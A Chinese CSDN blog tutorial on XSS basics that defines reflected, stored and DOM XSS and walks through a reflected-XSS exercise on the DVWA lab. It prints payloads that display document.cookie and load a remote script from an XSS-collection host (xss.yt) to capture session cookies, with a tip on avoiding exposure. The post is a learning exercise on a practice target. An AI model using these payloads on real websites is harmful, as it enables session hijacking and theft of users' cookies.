XSS注入基础篇

最新推荐文章于 2023-12-27 09:14:32 发布
最新推荐文章于 2023-12-27 09:14:32 发布
阅读量197 收藏
点赞数 1
分类专栏: 安全 文章标签: xss php 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyp20011020/article/details/129531621
版权

文章目录

XSS注入基础篇

1.XSS原理及分类

跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击。

精简定义,web程序在开发的时候没有对用户的输入进行严格的控制,导致用户的某些非法恶意输入可以在我们的页面上加载外部脚本资源。泄露客户端本地存储的用户敏感信息(尤指cookie)。引发严重的后果

2.XSS漏洞分类

从攻击手段上分类,xss可以分为两类,就是反射型和存储型。存储型是危害最大的,也是厂商会收集的漏洞。其利用插入数据库可以多次读取的缘故,更容易盗取管理人员和其他用户的cookie信息。反射型XSS需要发送给攻击目标在攻击目标访问目标网页时,才能达到攻击效果
反射型XSS又因为作用位置的不同分为两类,反射型XSS和dom型XSS,反射型XSS作用位置在HTML标签内部发生注入。而dom型XSS的触发本质是在JS代码的执行过程中被触发

2.1反射性XSS

反射型XSS 是非持久性、参数型的跨站脚本。反射型XSS 的JS 代码在Web 应用的参数(变量)中,如搜索框的反射型XSS。在搜索框中,提交PoC[scriptalert(/xss/)/script],点击搜索,即可触发反射型XSS。注意到,我们提交的poc 会出现在search.php 页面的keywords 参数中

示例:靶场 dvwa low级别反射型XSS复现
在这里插入图片描述
生成弹窗说明js代码被注入
在这里插入图片描述
弹出cookie

<script>alert(document.cookie)</script>

在这里插入图片描述

<sCRiPt/SrC=//xss.yt/ljo0>

这里选择默认就行了,注意这里的keepsession最好不要勾选,容易造成我们的攻击暴露
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

此时模拟恶意用户误点了插入了恶意的JS的链接:
在这里插入图片描述

攻击流程

反射型XSS攻击流程
在这里插入图片描述

追梦者wyp
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全基础-合集
10-23
WEB安全基础—合集,包含基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等。适合新手上手参考学习,通过本文档,可以快速了解渗透测试。
Web安全深度剖析(张柄帅)
07-25
第1 基础 第1章 Web安全简介 2 1.1 服务器是如何被入侵的 2 1.2 如何更好地学习Web安全 4 第2章 深入HTTP请求流程 6 2.1 HTTP协议解析 6 2.1.1 发起HTTP请求 6 2.1.2 HTTP协议详解 7 2.1.3 模拟HTTP请求 13 ...
实验三:XSS和SQL注入
Dance_in_night的博客
11-22 665
实验三:XSS和SQL注入
SQL注入XSS攻击
neverSaynever_的博客
02-20 1551
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
PHP防范XSS攻击
IT部落格
03-03 2699
定义 XSS(Cross Site Scripting)攻击,中文名为跨站脚本攻击,是一种常见的网页攻击方式。 攻击者在web页面中插入一些恶意的javascript或HTML代码,当用户浏览该页面的时候,嵌入到web页面中的javascript/HTML代码会被执行,从而达到攻击目的。 一个简单的例子就是网页中的评论功能,用户编写一段javascript代码(见下面)提交到服务器,如果不做过滤就直接显示出来的话,就会导致用户一打开页面就会有弹窗提示“你被攻击了”。 <script>window
如何在 PHP 中防止 XSS
allway2的博客
07-24 2004
要解决此问题,您需要将htmlspecialchars()与所需参数一起使用,如果您在URL中使用用户数据,则将其与urlencode()函数结合使用。实际上,您可能会注意到,在Codeigniter部分中,我没有讨论属性问题,我已经在其他框架中讨论过。这三种类型的最大区别在于,在存储的XSS中,用户数据保存在数据库中,这与反射和基于DOM的XSS漏洞相反。现在,当我问我的大多数客户和学生,这个漏洞的影响是什么时,他们不断地告诉我,比如窃取用户信息、控制应用程序等等,仅此而已。...
php实战案例记录(8)去除XSS的函数
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
10-02 555
addslashes()函数是PHP中的内置函数,用于将字符串中的特殊字符(如单引号、双引号、反斜杠等)前面添加反斜杠,以便在SQL语句中使用或者避免跨站点脚本攻击(XSS)。该函数的语法为:addslashes(stringstring。其中,string参数为必需,用于指定需要处理的字符串。在上面的例子中,addslashes()函数将字符串$str中的单引号前面添加了反斜杠,从而得到转义后的字符串。
代码审计 企业级Web代码安全架构
01-21
第4~6章则介绍常见漏洞的审计方法,分别对应基础、进阶以及深入,涵盖SQL注入漏洞、XSS漏洞、文件操作漏洞、代码/命令执行漏洞、变量覆盖漏洞以及逻辑处理等漏洞;第7章介绍二次漏洞的挖掘方法;第8章介绍...
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料
最新发布
01-30
01.WEB安全简介 02.信息收集 03.漏洞扫描 ...05.SQL注入基础 07.暴力破解 08.文件上传漏洞 09.命令执行漏洞 10.文件包含漏洞 11.社会工程学 12.ARP欺骗 13.xss跨站脚本漏洞 14.CSRF跨站请求伪造 15.SSRF
php xss攻击
技术的搬运工
01-29 858
xss攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括php、VBScript、ActiveX、 Flash 或者甚至是普通的HTML。
php解决XSS攻击
php-yyds
12-27 1290
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的Web应用程序安全漏洞。它允许攻击者将恶意脚本注入到受害者的浏览器中,并在受害者访问受漏洞影响的网页时执行这些恶意脚本。XSS攻击通常发生在Web应用程序对用户输入的处理过程中。攻击者可以利用未经过滤或转义的用户输入,将恶意的HTML、JavaScript或其他脚本注入到网页中。当其他用户访问这个被攻击的页面时,将执行这些恶意脚本,导致安全问题。
PHP防止xss攻击
yang_ldgd的博客
08-16 571
phpxss攻击
php xss 实例,【技术分享】每个人都该知道的7种主要的XSS案例
weixin_32401411的博客
03-29 247
预估稿费:160RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿0x00 引子“Master the 7 Main XSS Cases and be able to spot more than 90% of XSS vulnerabilities out there.”这句话说的这么diao,吓得我赶紧早早起来好好学学姿势。当我们读一些XSS相关资料时,经常能看到像al...
PHP代码审计 ------- XSS漏洞
qq_62344745的博客
04-16 183
跨站脚本攻击(Cross Site Scripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。为了与层叠样式表( Cascading Style Sheets )的缩写CSS区分开,跨站脚本攻击通常简写为XSS
XSS,CSRF,SSRF,RCE
qq_41672971的博客
12-10 264
1111111
XSS注入基础入门
好好睡觉
02-17 4677
XSS注入基础XSS注入原理,XSS注入分类
【渗透测试】XSS注入原理
谈论现实
01-15 2905
XSS注入原理 XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSSXSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 XSS 攻击。 XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。 <script>alert(/XSS/)</script> <script&
解决XSS脚本攻击恶意代码的方法
czq_2020的博客
08-05 1393
XSS跨站脚本攻击 XSS攻击全称跨站脚本攻击,为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中,获取网站隐秘信息,列如cookie信息等。 能被XSS攻击需要以下两点: 一、需要向web页面注入恶意代码; ​ 二、这些恶意代码能够被浏览器成功的执行。 解决XSS攻击的恶意代码方法 XSS攻击一般在留言框、评论框、微博里常见,可通
防止XSS攻击封装
weixin_30682415的博客
08-12 373
<?php if (!function_exists('remove_xss')) { //使用htmlpurifier防范xss攻击 function remove_xss($string){ //composer安装的,不需要此步骤。相对index.php入口文件,引入HTMLPurifier.auto.php核心文件 // ...
XSS注入payload
05-10
XSS(跨站脚本攻击)注入的payload可以有很多种形式,下面列举几个常见的payload形式: 1. `<script>alert('XSS')</script>`:这是最简单的XSS payload,它会在页面中弹出一个警告框,显示“XSS”字样。 2. `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值